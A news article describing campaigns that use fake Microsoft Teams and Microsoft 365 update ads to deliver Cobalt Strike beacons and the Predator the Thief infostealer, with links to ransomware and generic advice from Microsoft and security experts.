Cybercriminals attach ransomware to deceptive advertisements for phony Microsoft Teams updates
In a series of recent cyber attacks, cybercriminals have been using deceitful tactics to infiltrate networks, with a particular focus on Microsoft's Teams software.
According to Microsoft, the attacks involve the use of fake Microsoft 365 updates ads, which, when clicked, lead victims to domains under the control of the attackers. This tactic is part of a broader strategy to deploy malware, including Cobalt Strike and Predator the Thief malware.
Cobalt Strike, a penetration tool, has become a popular choice among cybercriminals. When misused, it can compromise an entire network, performing reconnaissance, browser pivoting, and unmonitored communication. The group known as "Wizard Spider" is associated with Cobalt Strike attacks linked to Ryuk ransomware incidents.
Predator the Thief malware, originally discovered in 2018, is often found on hacking forums and performs typical functions of a stealer malware. Unlike other stealers written in C#, Predator is "fully written in C/C++."
In one reported attack, when a victim clicked on a corrupt link, a PowerShell script was executed via a payloader, resulting in the download of Predator the Thief infostealer and Cobalt Strike beacons.
IBM uncovered an overlap in code signing certificates between Cobalt Strike Beacon and Ryuk, suggesting a possible connection between the two. This discovery adds to the growing evidence linking Cobalt Strike to ransomware attacks.
The mass remote work environment increases the chance of success for these types of attacks, as employees may use personal devices without corporate email security protections. Microsoft encourages customers to practice good computing habits online, including exercising caution when clicking on links.
Employee awareness and training are key to mitigating these attacks, according to Dan L. Dodson, CEO of Fortified Health Security. He encourages employees to ask questions and learn from one another in the fight against cyber threats.
Microsoft suggests using Microsoft's Defender ATP to mitigate the FakeUpdates risk, which is linked to the DoppelPaymer and WastedLocker ransomware strains. At least 60,000 parked domains became "malicious," or linked to phishing and malware, between March and September, according to Palo Alto Networks' Unit 42.
The reported attacks are using known tactics and tools, including Predator the Thief malware and Cobalt Strike. To disguise the malicious activity, a "legitimate copy" of Microsoft 365 was also installed in some cases. Microsoft is investigating these reports and will continue to provide updates as more information becomes available.
Read also:
- Auto Industry Update: Geotab, C2A, Deloitte, NOVOSENSE, Soracom, and Panasonic in Focus
- Preparations Underway for the 2022 FIFA World Cup: Impact on Sports Betting Industry
- Russia's harmful cyber operations, directed at the UK, face strong criticism from Estonia
- Health Risk Warning: The Harmful Effects of Sitting Too Much, Exploring Sedentary Lifestyles
